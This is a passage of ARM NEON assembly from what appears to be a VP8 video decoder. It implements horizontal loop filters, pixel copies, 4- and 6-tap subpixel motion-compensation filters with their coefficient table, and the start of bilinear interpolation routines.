sub r0, r0, #4
.if !\simple
ldr r12, [sp, #64] @ hev_thresh
.endif
@ Load pixels:
vld1.8 {d0}, [r0], r1 @ load first 8-line src data
vld1.8 {d2}, [r0], r1
vld1.8 {d4}, [r0], r1
vld1.8 {d6}, [r0], r1
vld1.8 {d8}, [r0], r1
vld1.8 {d10}, [r0], r1
vld1.8 {d12}, [r0], r1
vld1.8 {d14}, [r0], r1
vld1.8 {d1}, [r0], r1 @ load second 8-line src data
vld1.8 {d3}, [r0], r1
vld1.8 {d5}, [r0], r1
vld1.8 {d7}, [r0], r1
vld1.8 {d9}, [r0], r1
vld1.8 {d11}, [r0], r1
vld1.8 {d13}, [r0], r1
vld1.8 {d15}, [r0], r1
transpose_8x8 q0, q1, q2, q3, q4, q5, q6, q7
vdup.8 q14, r2 @ flim_E
.if !\simple
vdup.8 q15, r3 @ flim_I
.endif
vp8_loop_filter inner=\inner, simple=\simple
sub r0, r0, r1, lsl #4 @ backup 16 rows
transpose_8x8 q0, q1, q2, q3, q4, q5, q6, q7
@ Store pixels:
vst1.8 {d0}, [r0], r1
vst1.8 {d2}, [r0], r1
vst1.8 {d4}, [r0], r1
vst1.8 {d6}, [r0], r1
vst1.8 {d8}, [r0], r1
vst1.8 {d10}, [r0], r1
vst1.8 {d12}, [r0], r1
vst1.8 {d14}, [r0], r1
vst1.8 {d1}, [r0], r1
vst1.8 {d3}, [r0], r1
vst1.8 {d5}, [r0], r1
vst1.8 {d7}, [r0], r1
vst1.8 {d9}, [r0], r1
vst1.8 {d11}, [r0], r1
vst1.8 {d13}, [r0], r1
vst1.8 {d15}, [r0]
vpop {q4-q7}
bx lr
endfunc
.endm
vp8_h_loop_filter16
vp8_h_loop_filter16 _inner, inner=1
vp8_h_loop_filter16 _simple, simple=1
.macro vp8_h_loop_filter8uv name, inner=0
function ff_vp8_h_loop_filter8uv\name\()_neon, export=1
vpush {q4-q7}
sub r0, r0, #4
sub r1, r1, #4
ldr r12, [sp, #64] @ flim_I
@ Load pixels:
vld1.8 {d0}, [r0], r2 @ load u
vld1.8 {d1}, [r1], r2 @ load v
vld1.8 {d2}, [r0], r2
vld1.8 {d3}, [r1], r2
vld1.8 {d4}, [r0], r2
vld1.8 {d5}, [r1], r2
vld1.8 {d6}, [r0], r2
vld1.8 {d7}, [r1], r2
vld1.8 {d8}, [r0], r2
vld1.8 {d9}, [r1], r2
vld1.8 {d10}, [r0], r2
vld1.8 {d11}, [r1], r2
vld1.8 {d12}, [r0], r2
vld1.8 {d13}, [r1], r2
vld1.8 {d14}, [r0], r2
vld1.8 {d15}, [r1], r2
transpose_8x8 q0, q1, q2, q3, q4, q5, q6, q7
vdup.8 q14, r3 @ flim_E
vdup.8 q15, r12 @ flim_I
ldr r12, [sp, #68] @ hev_thresh
vp8_loop_filter inner=\inner
sub r0, r0, r2, lsl #3 @ backup u 8 rows
sub r1, r1, r2, lsl #3 @ backup v 8 rows
transpose_8x8 q0, q1, q2, q3, q4, q5, q6, q7
@ Store pixels:
vst1.8 {d0}, [r0], r2
vst1.8 {d1}, [r1], r2
vst1.8 {d2}, [r0], r2
vst1.8 {d3}, [r1], r2
vst1.8 {d4}, [r0], r2
vst1.8 {d5}, [r1], r2
vst1.8 {d6}, [r0], r2
vst1.8 {d7}, [r1], r2
vst1.8 {d8}, [r0], r2
vst1.8 {d9}, [r1], r2
vst1.8 {d10}, [r0], r2
vst1.8 {d11}, [r1], r2
vst1.8 {d12}, [r0], r2
vst1.8 {d13}, [r1], r2
vst1.8 {d14}, [r0]
vst1.8 {d15}, [r1]
vpop {q4-q7}
bx lr
endfunc
.endm
vp8_h_loop_filter8uv
vp8_h_loop_filter8uv _inner, inner=1
function ff_put_vp8_pixels16_neon, export=1
ldr r12, [sp, #0] @ h
1:
subs r12, r12, #4
vld1.8 {q0}, [r2], r3
vld1.8 {q1}, [r2], r3
vld1.8 {q2}, [r2], r3
vld1.8 {q3}, [r2], r3
vst1.8 {q0}, [r0,:128], r1
vst1.8 {q1}, [r0,:128], r1
vst1.8 {q2}, [r0,:128], r1
vst1.8 {q3}, [r0,:128], r1
bgt 1b
bx lr
endfunc
function ff_put_vp8_pixels8_neon, export=1
ldr r12, [sp, #0] @ h
1:
subs r12, r12, #4
vld1.8 {d0}, [r2], r3
vld1.8 {d1}, [r2], r3
vld1.8 {d2}, [r2], r3
vld1.8 {d3}, [r2], r3
vst1.8 {d0}, [r0,:64], r1
vst1.8 {d1}, [r0,:64], r1
vst1.8 {d2}, [r0,:64], r1
vst1.8 {d3}, [r0,:64], r1
bgt 1b
bx lr
endfunc
/* 4/6-tap 8th-pel MC */
.macro vp8_epel8_h6 d, a, b
vext.8 d27, \a, \b, #1
vmovl.u8 q8, \a
vext.8 d28, \a, \b, #2
vmovl.u8 q9, d27
vext.8 d29, \a, \b, #3
vmovl.u8 q10, d28
vext.8 d30, \a, \b, #4
vmovl.u8 q11, d29
vext.8 d31, \a, \b, #5
vmovl.u8 q12, d30
vmul.u16 q10, q10, d0[2]
vmovl.u8 q13, d31
vmul.u16 q11, q11, d0[3]
vmls.u16 q10, q9, d0[1]
vmls.u16 q11, q12, d1[0]
vmla.u16 q10, q8, d0[0]
vmla.u16 q11, q13, d1[1]
vqadd.s16 q11, q10, q11
vqrshrun.s16 \d, q11, #7
.endm
.macro vp8_epel16_h6 d0, d1, s0, s1, s2, q0, q1
vext.8 q14, \q0, \q1, #3
vext.8 q15, \q0, \q1, #4
vmovl.u8 q11, d28
vmovl.u8 q14, d29
vext.8 q3, \q0, \q1, #2
vmovl.u8 q12, d30
vmovl.u8 q15, d31
vext.8 q8, \q0, \q1, #1
vmovl.u8 q10, d6
vmovl.u8 q3, d7
vext.8 q2, \q0, \q1, #5
vmovl.u8 q13, d4
vmovl.u8 q2, d5
vmovl.u8 q9, d16
vmovl.u8 q8, d17
vmul.u16 q11, q11, d0[3]
vmul.u16 q10, q10, d0[2]
vmul.u16 q3, q3, d0[2]
vmul.u16 q14, q14, d0[3]
vmls.u16 q11, q12, d1[0]
vmovl.u8 q12, \s0
vmovl.u8 q1, \s1
vmls.u16 q10, q9, d0[1]
vmls.u16 q3, q8, d0[1]
vmls.u16 q14, q15, d1[0]
vmla.u16 q10, q12, d0[0]
vmla.u16 q11, q13, d1[1]
vmla.u16 q3, q1, d0[0]
vmla.u16 q14, q2, d1[1]
vqadd.s16 q11, q10, q11
vqadd.s16 q14, q3, q14
vqrshrun.s16 \d0, q11, #7
vqrshrun.s16 \d1, q14, #7
.endm
.macro vp8_epel8_v6 d0, s0, s1, s2, s3, s4, s5
vmovl.u8 q10, \s2
vmovl.u8 q11, \s3
vmovl.u8 q9, \s1
vmovl.u8 q12, \s4
vmovl.u8 q8, \s0
vmovl.u8 q13, \s5
vmul.u16 q10, q10, d0[2]
vmul.u16 q11, q11, d0[3]
vmls.u16 q10, q9, d0[1]
vmls.u16 q11, q12, d1[0]
vmla.u16 q10, q8, d0[0]
vmla.u16 q11, q13, d1[1]
vqadd.s16 q11, q10, q11
vqrshrun.s16 \d0, q11, #7
.endm
.macro vp8_epel8_v6_y2 d0, d1, s0, s1, s2, s3, s4, s5, s6
vmovl.u8 q10, \s0
vmovl.u8 q11, \s3
vmovl.u8 q14, \s6
vmovl.u8 q9, \s1
vmovl.u8 q12, \s4
vmovl.u8 q8, \s2
vmovl.u8 q13, \s5
vmul.u16 q10, q10, d0[0]
vmul.u16 q15, q11, d0[3]
vmul.u16 q11, q11, d0[2]
vmul.u16 q14, q14, d1[1]
vmls.u16 q10, q9, d0[1]
vmls.u16 q15, q12, d1[0]
vmls.u16 q11, q8, d0[1]
vmls.u16 q14, q13, d1[0]
vmla.u16 q10, q8, d0[2]
vmla.u16 q15, q13, d1[1]
vmla.u16 q11, q9, d0[0]
vmla.u16 q14, q12, d0[3]
vqadd.s16 q15, q10, q15
vqadd.s16 q14, q11, q14
vqrshrun.s16 \d0, q15, #7
vqrshrun.s16 \d1, q14, #7
.endm
.macro vp8_epel8_h4 d, a, b
vext.8 d28, \a, \b, #1
vmovl.u8 q9, \a
vext.8 d29, \a, \b, #2
vmovl.u8 q10, d28
vext.8 d30, \a, \b, #3
vmovl.u8 q11, d29
vmovl.u8 q12, d30
vmul.u16 q10, q10, d0[2]
vmul.u16 q11, q11, d0[3]
vmls.u16 q10, q9, d0[1]
vmls.u16 q11, q12, d1[0]
vqadd.s16 q11, q10, q11
vqrshrun.s16 \d, q11, #7
.endm
.macro vp8_epel8_v4_y2 d0, d1, s0, s1, s2, s3, s4
vmovl.u8 q9, \s0
vmovl.u8 q10, \s1
vmovl.u8 q11, \s2
vmovl.u8 q12, \s3
vmovl.u8 q13, \s4
vmul.u16 q8, q10, d0[2]
vmul.u16 q14, q11, d0[3]
vmul.u16 q11, q11, d0[2]
vmul.u16 q15, q12, d0[3]
vmls.u16 q8, q9, d0[1]
vmls.u16 q14, q12, d1[0]
vmls.u16 q11, q10, d0[1]
vmls.u16 q15, q13, d1[0]
vqadd.s16 q8, q8, q14
vqadd.s16 q11, q11, q15
vqrshrun.s16 \d0, q8, #7
vqrshrun.s16 \d1, q11, #7
.endm
function ff_put_vp8_epel16_v6_neon, export=1
sub r2, r2, r3, lsl #1
push {r4,lr}
vpush {d8-d15}
ldr r4, [sp, #80] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #72] @ h
add r4, lr, r4, lsl #4
vld1.16 {q0}, [r4,:128]
1:
vld1.8 {d2-d3}, [r2], r3
vld1.8 {d4-d5}, [r2], r3
vld1.8 {d6-d7}, [r2], r3
vld1.8 {d8-d9}, [r2], r3
vld1.8 {d10-d11},[r2], r3
vld1.8 {d12-d13},[r2], r3
vld1.8 {d14-d15},[r2]
sub r2, r2, r3, lsl #2
vp8_epel8_v6_y2 d2, d4, d2, d4, d6, d8, d10, d12, d14
vp8_epel8_v6_y2 d3, d5, d3, d5, d7, d9, d11, d13, d15
vst1.8 {d2-d3}, [r0,:128], r1
vst1.8 {d4-d5}, [r0,:128], r1
subs r12, r12, #2
bne 1b
vpop {d8-d15}
pop {r4,pc}
endfunc
function ff_put_vp8_epel16_h6_neon, export=1
sub r2, r2, #2
push {r4,lr}
ldr r4, [sp, #12] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
vld1.16 {q0}, [r4,:128]
1:
vld1.8 {d2-d4}, [r2], r3
vp8_epel16_h6 d2, d3, d2, d3, d4, q1, q2
vst1.8 {d2-d3}, [r0,:128], r1
subs r12, r12, #1
bne 1b
pop {r4,pc}
endfunc
function ff_put_vp8_epel16_h6v6_neon, export=1
sub r2, r2, r3, lsl #1
sub r2, r2, #2
push {r4,lr}
vpush {d8-d9}
@ first pass (horizontal):
ldr r4, [sp, #28] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #24] @ h
add r4, lr, r4, lsl #4
sub sp, sp, #336+16
vld1.16 {q0}, [r4,:128]
add lr, sp, #15
add r12, r12, #5
bic lr, lr, #15
1:
vld1.8 {d2,d3,d4}, [r2], r3
vp8_epel16_h6 d2, d3, d2, d3, d4, q1, q2
vst1.8 {d2-d3}, [lr,:128]!
subs r12, r12, #1
bne 1b
@ second pass (vertical):
ldr r4, [sp, #336+16+32] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #336+16+24] @ h
add r4, lr, r4, lsl #4
add lr, sp, #15
vld1.16 {q0}, [r4,:128]
bic lr, lr, #15
2:
vld1.8 {d2-d5}, [lr,:128]!
vld1.8 {d6-d9}, [lr,:128]!
vld1.8 {d28-d31},[lr,:128]
sub lr, lr, #48
vp8_epel8_v6 d2, d2, d4, d6, d8, d28, d30
vp8_epel8_v6 d3, d3, d5, d7, d9, d29, d31
vst1.8 {d2-d3}, [r0,:128], r1
subs r12, r12, #1
bne 2b
add sp, sp, #336+16
vpop {d8-d9}
pop {r4,pc}
endfunc
function ff_put_vp8_epel8_v6_neon, export=1
sub r2, r2, r3, lsl #1
push {r4,lr}
ldr r4, [sp, #16] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
vld1.16 {q0}, [r4,:128]
1:
vld1.8 {d2}, [r2], r3
vld1.8 {d3}, [r2], r3
vld1.8 {d4}, [r2], r3
vld1.8 {d5}, [r2], r3
vld1.8 {d6}, [r2], r3
vld1.8 {d7}, [r2], r3
vld1.8 {d28}, [r2]
sub r2, r2, r3, lsl #2
vp8_epel8_v6_y2 d2, d3, d2, d3, d4, d5, d6, d7, d28
vst1.8 {d2}, [r0,:64], r1
vst1.8 {d3}, [r0,:64], r1
subs r12, r12, #2
bne 1b
pop {r4,pc}
endfunc
function ff_put_vp8_epel8_h6_neon, export=1
sub r2, r2, #2
push {r4,lr}
ldr r4, [sp, #12] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
vld1.16 {q0}, [r4,:128]
1:
vld1.8 {d2,d3}, [r2], r3
vp8_epel8_h6 d2, d2, d3
vst1.8 {d2}, [r0,:64], r1
subs r12, r12, #1
bne 1b
pop {r4,pc}
endfunc
function ff_put_vp8_epel8_h6v6_neon, export=1
sub r2, r2, r3, lsl #1
sub r2, r2, #2
push {r4,lr}
@ first pass (horizontal):
ldr r4, [sp, #12] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
sub sp, sp, #168+16
vld1.16 {q0}, [r4,:128]
add lr, sp, #15
add r12, r12, #5
bic lr, lr, #15
1:
vld1.8 {d2,d3}, [r2], r3
vp8_epel8_h6 d2, d2, d3
vst1.8 {d2}, [lr,:64]!
subs r12, r12, #1
bne 1b
@ second pass (vertical):
ldr r4, [sp, #168+16+16] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #168+16+8] @ h
add r4, lr, r4, lsl #4
add lr, sp, #15
vld1.16 {q0}, [r4,:128]
bic lr, lr, #15
2:
vld1.8 {d2-d5}, [lr,:128]!
vld1.8 {d6-d7}, [lr,:128]!
vld1.8 {d30}, [lr,:64]
sub lr, lr, #32
vp8_epel8_v6_y2 d2, d3, d2, d3, d4, d5, d6, d7, d30
vst1.8 {d2}, [r0,:64], r1
vst1.8 {d3}, [r0,:64], r1
subs r12, r12, #2
bne 2b
add sp, sp, #168+16
pop {r4,pc}
endfunc
function ff_put_vp8_epel8_v4_neon, export=1
sub r2, r2, r3
push {r4,lr}
ldr r4, [sp, #16] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
vld1.16 {q0}, [r4,:128]
1:
vld1.8 {d2}, [r2], r3
vld1.8 {d3}, [r2], r3
vld1.8 {d4}, [r2], r3
vld1.8 {d5}, [r2], r3
vld1.8 {d6}, [r2]
sub r2, r2, r3, lsl #1
vp8_epel8_v4_y2 d2, d3, d2, d3, d4, d5, d6
vst1.8 {d2}, [r0,:64], r1
vst1.8 {d3}, [r0,:64], r1
subs r12, r12, #2
bne 1b
pop {r4,pc}
endfunc
function ff_put_vp8_epel8_h4_neon, export=1
sub r2, r2, #1
push {r4,lr}
ldr r4, [sp, #12] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
vld1.16 {q0}, [r4,:128]
1:
vld1.8 {d2,d3}, [r2], r3
vp8_epel8_h4 d2, d2, d3
vst1.8 {d2}, [r0,:64], r1
subs r12, r12, #1
bne 1b
pop {r4,pc}
endfunc
function ff_put_vp8_epel8_h4v4_neon, export=1
sub r2, r2, r3
sub r2, r2, #1
push {r4,lr}
@ first pass (horizontal):
ldr r4, [sp, #12] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
sub sp, sp, #168+16
vld1.16 {q0}, [r4,:128]
add lr, sp, #15
add r12, r12, #3
bic lr, lr, #15
1:
vld1.8 {d2,d3}, [r2], r3
vp8_epel8_h4 d2, d2, d3
vst1.8 {d2}, [lr,:64]!
subs r12, r12, #1
bne 1b
@ second pass (vertical):
ldr r4, [sp, #168+16+16] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #168+16+8] @ h
add r4, lr, r4, lsl #4
add lr, sp, #15
vld1.16 {q0}, [r4,:128]
bic lr, lr, #15
2:
vld1.8 {d2-d5}, [lr,:128]!
vld1.8 {d6}, [lr,:64]
sub lr, lr, #16
vp8_epel8_v4_y2 d2, d3, d2, d3, d4, d5, d6
vst1.8 {d2}, [r0,:64], r1
vst1.8 {d3}, [r0,:64], r1
subs r12, r12, #2
bne 2b
add sp, sp, #168+16
pop {r4,pc}
endfunc
function ff_put_vp8_epel8_h6v4_neon, export=1
sub r2, r2, r3
sub r2, r2, #2
push {r4,lr}
@ first pass (horizontal):
ldr r4, [sp, #12] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
sub sp, sp, #168+16
vld1.16 {q0}, [r4,:128]
add lr, sp, #15
add r12, r12, #3
bic lr, lr, #15
1:
vld1.8 {d2,d3}, [r2], r3
vp8_epel8_h6 d2, d2, d3
vst1.8 {d2}, [lr,:64]!
subs r12, r12, #1
bne 1b
@ second pass (vertical):
ldr r4, [sp, #168+16+16] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #168+16+8] @ h
add r4, lr, r4, lsl #4
add lr, sp, #15
vld1.16 {q0}, [r4,:128]
bic lr, lr, #15
2:
vld1.8 {d2-d5}, [lr,:128]!
vld1.8 {d6}, [lr,:64]
sub lr, lr, #16
vp8_epel8_v4_y2 d2, d3, d2, d3, d4, d5, d6
vst1.8 {d2}, [r0,:64], r1
vst1.8 {d3}, [r0,:64], r1
subs r12, r12, #2
bne 2b
add sp, sp, #168+16
pop {r4,pc}
endfunc
function ff_put_vp8_epel8_h4v6_neon, export=1
sub r2, r2, r3, lsl #1
sub r2, r2, #1
push {r4,lr}
@ first pass (horizontal):
ldr r4, [sp, #12] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
sub sp, sp, #168+16
vld1.16 {q0}, [r4,:128]
add lr, sp, #15
add r12, r12, #5
bic lr, lr, #15
1:
vld1.8 {d2,d3}, [r2], r3
vp8_epel8_h4 d2, d2, d3
vst1.8 {d2}, [lr,:64]!
subs r12, r12, #1
bne 1b
@ second pass (vertical):
ldr r4, [sp, #168+16+16] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #168+16+8] @ h
add r4, lr, r4, lsl #4
add lr, sp, #15
vld1.16 {q0}, [r4,:128]
bic lr, lr, #15
2:
vld1.8 {d2-d5}, [lr,:128]!
vld1.8 {d6-d7}, [lr,:128]!
vld1.8 {d30}, [lr,:64]
sub lr, lr, #32
vp8_epel8_v6_y2 d2, d3, d2, d3, d4, d5, d6, d7, d30
vst1.8 {d2}, [r0,:64], r1
vst1.8 {d3}, [r0,:64], r1
subs r12, r12, #2
bne 2b
add sp, sp, #168+16
pop {r4,pc}
endfunc
.ltorg
function ff_put_vp8_epel4_v6_neon, export=1
sub r2, r2, r3, lsl #1
push {r4,lr}
ldr r4, [sp, #16] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
vld1.16 {q0}, [r4,:128]
1:
vld1.32 {d2[]}, [r2], r3
vld1.32 {d3[]}, [r2], r3
vld1.32 {d4[]}, [r2], r3
vld1.32 {d5[]}, [r2], r3
vld1.32 {d6[]}, [r2], r3
vld1.32 {d7[]}, [r2], r3
vld1.32 {d28[]}, [r2]
sub r2, r2, r3, lsl #2
vld1.32 {d2[1]}, [r2], r3
vld1.32 {d3[1]}, [r2], r3
vld1.32 {d4[1]}, [r2], r3
vld1.32 {d5[1]}, [r2], r3
vld1.32 {d6[1]}, [r2], r3
vld1.32 {d7[1]}, [r2], r3
vld1.32 {d28[1]}, [r2]
sub r2, r2, r3, lsl #2
vp8_epel8_v6_y2 d2, d3, d2, d3, d4, d5, d6, d7, d28
vst1.32 {d2[0]}, [r0,:32], r1
vst1.32 {d3[0]}, [r0,:32], r1
vst1.32 {d2[1]}, [r0,:32], r1
vst1.32 {d3[1]}, [r0,:32], r1
subs r12, r12, #4
bne 1b
pop {r4,pc}
endfunc
function ff_put_vp8_epel4_h6_neon, export=1
sub r2, r2, #2
push {r4,lr}
ldr r4, [sp, #12] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
vld1.16 {q0}, [r4,:128]
1:
vld1.8 {q1}, [r2], r3
vp8_epel8_h6 d2, d2, d3
vst1.32 {d2[0]}, [r0,:32], r1
subs r12, r12, #1
bne 1b
pop {r4,pc}
endfunc
function ff_put_vp8_epel4_h6v6_neon, export=1
sub r2, r2, r3, lsl #1
sub r2, r2, #2
push {r4,lr}
ldr r4, [sp, #12] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
sub sp, sp, #52+16
vld1.16 {q0}, [r4,:128]
add lr, sp, #15
add r12, r12, #5
bic lr, lr, #15
1:
vld1.8 {q1}, [r2], r3
vp8_epel8_h6 d2, d2, d3
vst1.32 {d2[0]}, [lr,:32]!
subs r12, r12, #1
bne 1b
ldr r4, [sp, #52+16+16] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #52+16+8] @ h
add r4, lr, r4, lsl #4
add lr, sp, #15
vld1.16 {q0}, [r4,:128]
bic lr, lr, #15
2:
vld1.8 {d2-d3}, [lr,:128]!
vld1.8 {d6}, [lr,:64]!
vld1.32 {d28[]}, [lr,:32]
sub lr, lr, #16
vld1.8 {d4-d5}, [lr]!
vld1.8 {d7}, [lr,:64]!
vld1.32 {d28[1]}, [lr,:32]
sub lr, lr, #16
vtrn.32 q1, q2
vtrn.32 d6, d7
vp8_epel8_v6_y2 d2, d3, d2, d4, d3, d5, d6, d7, d28
vst1.32 {d2[0]}, [r0,:32], r1
vst1.32 {d3[0]}, [r0,:32], r1
vst1.32 {d2[1]}, [r0,:32], r1
vst1.32 {d3[1]}, [r0,:32], r1
subs r12, r12, #4
bne 2b
add sp, sp, #52+16
pop {r4,pc}
endfunc
function ff_put_vp8_epel4_h4v6_neon, export=1
sub r2, r2, r3, lsl #1
sub r2, r2, #1
push {r4,lr}
ldr r4, [sp, #12] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
sub sp, sp, #52+16
vld1.16 {q0}, [r4,:128]
add lr, sp, #15
add r12, r12, #5
bic lr, lr, #15
1:
vld1.8 {d2}, [r2], r3
vp8_epel8_h4 d2, d2, d2
vst1.32 {d2[0]}, [lr,:32]!
subs r12, r12, #1
bne 1b
ldr r4, [sp, #52+16+16] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #52+16+8] @ h
add r4, lr, r4, lsl #4
add lr, sp, #15
vld1.16 {q0}, [r4,:128]
bic lr, lr, #15
2:
vld1.8 {d2-d3}, [lr,:128]!
vld1.8 {d6}, [lr,:64]!
vld1.32 {d28[]}, [lr,:32]
sub lr, lr, #16
vld1.8 {d4-d5}, [lr]!
vld1.8 {d7}, [lr,:64]!
vld1.32 {d28[1]}, [lr,:32]
sub lr, lr, #16
vtrn.32 q1, q2
vtrn.32 d6, d7
vp8_epel8_v6_y2 d2, d3, d2, d4, d3, d5, d6, d7, d28
vst1.32 {d2[0]}, [r0,:32], r1
vst1.32 {d3[0]}, [r0,:32], r1
vst1.32 {d2[1]}, [r0,:32], r1
vst1.32 {d3[1]}, [r0,:32], r1
subs r12, r12, #4
bne 2b
add sp, sp, #52+16
pop {r4,pc}
endfunc
function ff_put_vp8_epel4_h6v4_neon, export=1
sub r2, r2, r3
sub r2, r2, #2
push {r4,lr}
ldr r4, [sp, #12] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
sub sp, sp, #44+16
vld1.16 {q0}, [r4,:128]
add lr, sp, #15
add r12, r12, #3
bic lr, lr, #15
1:
vld1.8 {q1}, [r2], r3
vp8_epel8_h6 d2, d2, d3
vst1.32 {d2[0]}, [lr,:32]!
subs r12, r12, #1
bne 1b
ldr r4, [sp, #44+16+16] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #44+16+8] @ h
add r4, lr, r4, lsl #4
add lr, sp, #15
vld1.16 {q0}, [r4,:128]
bic lr, lr, #15
2:
vld1.8 {d2-d3}, [lr,:128]!
vld1.32 {d6[]}, [lr,:32]
sub lr, lr, #8
vld1.8 {d4-d5}, [lr]!
vld1.32 {d6[1]}, [lr,:32]
sub lr, lr, #8
vtrn.32 q1, q2
vp8_epel8_v4_y2 d2, d3, d2, d4, d3, d5, d6
vst1.32 {d2[0]}, [r0,:32], r1
vst1.32 {d3[0]}, [r0,:32], r1
vst1.32 {d2[1]}, [r0,:32], r1
vst1.32 {d3[1]}, [r0,:32], r1
subs r12, r12, #4
bne 2b
add sp, sp, #44+16
pop {r4,pc}
endfunc
function ff_put_vp8_epel4_h4_neon, export=1
sub r2, r2, #1
push {r4,lr}
ldr r4, [sp, #12] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
vld1.16 {q0}, [r4,:128]
1:
vld1.8 {d2}, [r2], r3
vp8_epel8_h4 d2, d2, d2
vst1.32 {d2[0]}, [r0,:32], r1
subs r12, r12, #1
bne 1b
pop {r4,pc}
endfunc
function ff_put_vp8_epel4_v4_neon, export=1
sub r2, r2, r3
push {r4,lr}
ldr r4, [sp, #16] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
vld1.16 {q0}, [r4,:128]
1:
vld1.32 {d2[]}, [r2], r3
vld1.32 {d3[]}, [r2], r3
vld1.32 {d4[]}, [r2], r3
vld1.32 {d5[]}, [r2], r3
vld1.32 {d6[]}, [r2]
sub r2, r2, r3, lsl #1
vld1.32 {d2[1]}, [r2], r3
vld1.32 {d3[1]}, [r2], r3
vld1.32 {d4[1]}, [r2], r3
vld1.32 {d5[1]}, [r2], r3
vld1.32 {d6[1]}, [r2]
sub r2, r2, r3, lsl #1
vp8_epel8_v4_y2 d2, d3, d2, d3, d4, d5, d6
vst1.32 {d2[0]}, [r0,:32], r1
vst1.32 {d3[0]}, [r0,:32], r1
vst1.32 {d2[1]}, [r0,:32], r1
vst1.32 {d3[1]}, [r0,:32], r1
subs r12, r12, #4
bne 1b
pop {r4,pc}
endfunc
function ff_put_vp8_epel4_h4v4_neon, export=1
sub r2, r2, r3
sub r2, r2, #1
push {r4,lr}
ldr r4, [sp, #12] @ mx
movrel lr, subpel_filters-16
ldr r12, [sp, #8] @ h
add r4, lr, r4, lsl #4
sub sp, sp, #44+16
vld1.16 {q0}, [r4,:128]
add lr, sp, #15
add r12, r12, #3
bic lr, lr, #15
1:
vld1.8 {d2}, [r2], r3
vp8_epel8_h4 d2, d2, d3
vst1.32 {d2[0]}, [lr,:32]!
subs r12, r12, #1
bne 1b
ldr r4, [sp, #44+16+16] @ my
movrel lr, subpel_filters-16
ldr r12, [sp, #44+16+8] @ h
add r4, lr, r4, lsl #4
add lr, sp, #15
vld1.16 {q0}, [r4,:128]
bic lr, lr, #15
2:
vld1.8 {d2-d3}, [lr,:128]!
vld1.32 {d6[]}, [lr,:32]
sub lr, lr, #8
vld1.8 {d4-d5}, [lr]!
vld1.32 {d6[1]}, [lr,:32]
sub lr, lr, #8
vtrn.32 q1, q2
vp8_epel8_v4_y2 d2, d3, d2, d4, d3, d5, d6
vst1.32 {d2[0]}, [r0,:32], r1
vst1.32 {d3[0]}, [r0,:32], r1
vst1.32 {d2[1]}, [r0,:32], r1
vst1.32 {d3[1]}, [r0,:32], r1
subs r12, r12, #4
bne 2b
add sp, sp, #44+16
pop {r4,pc}
endfunc
@ note: worst case sum of all 6-tap filter values * 255 is 0x7f80 so 16 bit
@ arithmatic can be used to apply filters
const subpel_filters, align=4
.short 0, 6, 123, 12, 1, 0, 0, 0
.short 2, 11, 108, 36, 8, 1, 0, 0
.short 0, 9, 93, 50, 6, 0, 0, 0
.short 3, 16, 77, 77, 16, 3, 0, 0
.short 0, 6, 50, 93, 9, 0, 0, 0
.short 1, 8, 36, 108, 11, 2, 0, 0
.short 0, 1, 12, 123, 6, 0, 0, 0
endconst
/* Bilinear MC */
function ff_put_vp8_bilin16_h_neon, export=1
ldr r12, [sp, #4] @ mx
vdup.8 d0, r12
rsb r12, r12, #8
vdup.8 d1, r12
ldr r12, [sp] @ h
1:
subs r12, r12, #2
vld1.8 {d2-d4}, [r2], r3
vext.8 q2, q1, q2, #1
vmull.u8 q8, d2, d1
vmlal.u8 q8, d4, d0
vld1.8 {d18-d20},[r2], r3
vmull.u8 q3, d3, d1
vmlal.u8 q3, d5, d0
vext.8 q10, q9, q10, #1
vmull.u8 q11, d18, d1
vmlal.u8 q11, d20, d0
vmull.u8 q12, d19, d1
vmlal.u8 q12, d21, d0
vrshrn.u16 d4, q8, #3
vrshrn.u16 d5, q3, #3
vrshrn.u16 d6, q11, #3
vrshrn.u16 d7, q12, #3
vst1.8 {q2}, [r0,:128], r1
vst1.8 {q3}, [r0,:128], r1
bgt 1b
bx lr
endfunc
function ff_put_vp8_bilin16_v_neon, export=1
ldr r12, [sp, #8] @ my
vdup.8 d0, r12
rsb r12, r12, #8
vdup.8 d1, r12
ldr r12, [sp] @ h
vld1.8 {q1}, [r2], r3
1:
subs r12, r12, #2
vld1.8 {q2}, [r2], r3
vmull.u8 q3, d2, d1
vmlal.u8 q3, d4, d0
vmull.u8 q8, d3, d1
vmlal.u8 q8, d5, d0
vld1.8 {q1}, [r2], r3
vmull.u8 q9, d4, d1
vmlal.u8 q9, d2, d0
